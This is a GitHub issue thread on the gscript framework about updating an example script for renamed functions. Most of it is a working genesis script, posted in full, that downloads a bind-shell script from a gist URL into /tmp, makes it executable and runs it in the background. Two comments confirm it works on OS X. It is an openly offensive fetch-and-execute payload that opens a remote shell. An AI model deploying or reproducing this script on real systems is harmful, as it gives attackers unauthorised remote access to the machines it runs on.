### ISSUE TITLE
examples/generic_bindshell_osx.gs

### ISSUE THREAD

**Issue by droberson** [gen0cide/gscript#62]
It appears that RetrieveFileFromURL has been replaced with HTTPGetFile and ForkExec has been replaced with ForkExecuteCommand, so this example doesn't seem to work anymore.

This works provided the script on ahhh's gist works correctly (haven't tested on osx, but it downloads + executes the script w/ syntax error on Linux):

// genesis script, spawns a generic bind shell in the background

function BeforeDeploy() {
  console.log("Testing generic bind shell pulled from the web");
  return true; 
}

function Deploy() {
  var url = "https://gist.githubusercontent.com/ahhh/609cdf5abaa22e233976aec55a3e0dfd/raw/20cce584caeab27c3be3a7a612fda0ec3e99f94d/simple_bind.sh";
  var file_3 = "/tmp/bind.sh";
  var response2 = HTTPGetFile(url);
  var response3 = WriteFile(file_3, response2.file, 0755);
  var hash = MD5(file_3);
  console.log("MD5 of " + file_3 + ": " + hash.value);
  return true;
}

function AfterDeploy() {
  ForkExecuteCommand("/bin/sh", ["/tmp/bind.sh"]);
  console.log("Test complete");
  return true;
}

**Comment by ahhh** [comment]
the gist works for OS X, you should submit a pr to fix it! They rewrote the netlibs w/o making them backwards compatible

**Comment by droberson** [comment]
thanks for confirming it works on osx. i'll make a PR shortly.
